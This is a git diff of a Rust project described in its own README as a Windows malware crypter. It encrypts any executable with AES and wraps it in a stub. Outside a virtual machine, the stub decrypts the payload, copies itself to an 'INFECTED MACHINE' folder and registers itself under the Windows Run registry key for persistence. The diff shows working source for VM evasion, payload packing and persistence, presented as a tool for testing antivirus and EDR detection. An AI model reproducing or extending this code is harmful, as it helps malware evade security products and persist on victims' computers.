diff --git a/.gitignore b/.gitignore new file mode 100644 index 0000000..9561e41 --- /dev/null +++ b/.gitignore @@ -0,0 +1 @@ +**/target/** diff --git a/README.md b/README.md index 5dd23a0..ed4fddb 100644 --- a/README.md +++ b/README.md @@ -2,8 +2,8 @@ x86-64 Malware Crypter built in Rust for Windows with Anti-VM, powered by memexec ## Usage -1. Put your Portable Executable in /crypt/ and rename it to example.exe (or change the code to be the same name as your PE) -2. In /crypt/ `cargo run` +1. Put your Portable Executable in /crypt/ +2. In /crypt/ `cargo run ` (will output encrypted_bytes.bin and key.txt) 3. move encrypted_bytes.bin and key.txt to /stub/src/ 4. In /stub/ `cargo build --target x86_64-pc-windows-gnu --release` or build without `--release` to keep debug symbols @@ -24,7 +24,7 @@ x86-64 Malware Crypter built in Rust for Windows with Anti-VM, powered by memexe - Obfuscated Strings ## Disclaimer -This is a tool used to test the Dynamic detection capabilites of AV and EDR, use of this project is at your own risk +This is a tool used to test the Static + Dynamic detection capabilites of AV and EDR, use of this project is at your own risk ## MITRE TTPs (Indicators) - User Execution: Malicious File T1204.002 diff --git a/crypt/src/main.rs b/crypt/src/main.rs index 881c1e4..cc87016 100644 --- a/crypt/src/main.rs +++ b/crypt/src/main.rs @@ -1,17 +1,23 @@ +use aes::cipher::{generic_array::GenericArray, BlockEncrypt, KeyInit}; use aes::Aes128; -use aes::cipher::{ - BlockEncrypt, KeyInit, - generic_array::GenericArray, -}; +use rand::rngs::StdRng; +use rand::{RngCore, SeedableRng}; use std::fs::read; use std::fs::File; use std::io::prelude::*; -use rand::rngs::StdRng; -use rand::{RngCore, SeedableRng}; fn main() -> std::io::Result<()> { // Read input file into a vector RENAME example.exe to what you want and put it in this "crypt" folder - let plaintext_bytes = read("hexowl.exe").expect("Failed to read file"); + let args: Vec = std::env::args().collect(); + if args.len() < 2 { + println!("Run with {} ", args.get(0).unwrap()); + return Err(std::io::Error::new( + std::io::ErrorKind::NotFound, + "file input not found", + )); + } + let fname = args.get(1).unwrap(); + let plaintext_bytes = read(fname).expect("Failed to read file"); let mut encrypted_file = File::create("encrypted_Input.bin")?; let mut key_file = File::create("key.txt")?; @@ -43,4 +49,4 @@ fn main() -> std::io::Result<()> { encrypted_file.write_all(&enc_bytes)?; key_file.write_all(&key)?; Ok(()) -} \ No newline at end of file +} diff --git a/stub/src/main.rs b/stub/src/main.rs index 8dcd45e..99d50a0 100644 --- a/stub/src/main.rs +++ b/stub/src/main.rs @@ -1,27 +1,20 @@ +use aes::cipher::{generic_array::GenericArray, BlockDecrypt, KeyInit}; use aes::Aes128; -use aes::cipher::{BlockDecrypt, KeyInit, - generic_array::GenericArray, -}; use inside_vm::inside_vm; -use std::process::Command; -use std::{fs, env}; -use std::io::{Read, Cursor, self}; use std::io::Result; +use std::io::{self, Cursor, Read}; use std::path::Path; +use std::process::Command; +use std::{env, fs}; use winreg::enums::{HKEY_CURRENT_USER, KEY_ALL_ACCESS}; use winreg::RegKey; - fn main() { - - if inside_vm(){ - + if inside_vm() { println!("This is in a vm"); std::process::exit(0); - } else { - println!("NO VM"); create_infected_directory(); @@ -43,7 +36,7 @@ fn decrypt_file() -> Result> { let key = GenericArray::from(key_bytes); let cipher = Aes128::new(&key); - // Decrypt the encrypted bytes in blocks + // Decrypt the encrypted bytes in blocks let mut decrypted_bytes = Vec::new(); for block in encrypted_bytes.chunks(16) { let mut block_array = GenericArray::clone_from_slice(block); @@ -54,9 +47,9 @@ fn decrypt_file() -> Result> { // Unpad the decrypted bytes let padding_size = decrypted_bytes.last().unwrap().clone() as usize; let decrypted_bytes = (&decrypted_bytes[..decrypted_bytes.len() - padding_size]).to_vec(); - + // return decrypted bytes - Ok(decrypted_bytes, ) + Ok(decrypted_bytes) } fn create_infected_directory() -> io::Result<()> { @@ -64,9 +57,8 @@ fn create_infected_directory() -> io::Result<()> { fs::create_dir_all(&infected_dir)?; let current_exe = env::current_exe()?; - let current_exe_filename = current_exe - .file_name(); - + let current_exe_filename = current_exe.file_name(); + let infected_exe_path = infected_dir.join(current_exe_filename.unwrap()); fs::copy(¤t_exe, &infected_exe_path)?; @@ -85,17 +77,18 @@ fn create_infected_directory() -> io::Result<()> { } fn persistence() -> io::Result<()> { - if let Ok(current_exe) = env::current_exe() { if let Some(file_name) = current_exe.file_stem() { - let executable_name = file_name.to_string_lossy(); let directory_path = "C:/Rust Crypter - INFECTED MACHINE/"; let file_path = format!("{}{}.exe", directory_path, executable_name); // Open the "Run" registry key let hkcu = RegKey::predef(HKEY_CURRENT_USER); - let run_key = hkcu.open_subkey_with_flags("Software\\Microsoft\\Windows\\CurrentVersion\\Run", KEY_ALL_ACCESS)?; + let run_key = hkcu.open_subkey_with_flags( + "Software\\Microsoft\\Windows\\CurrentVersion\\Run", + KEY_ALL_ACCESS, + )?; // Add the executable path to the "Run" registry key run_key.set_value("RustCrypter", &file_path).err();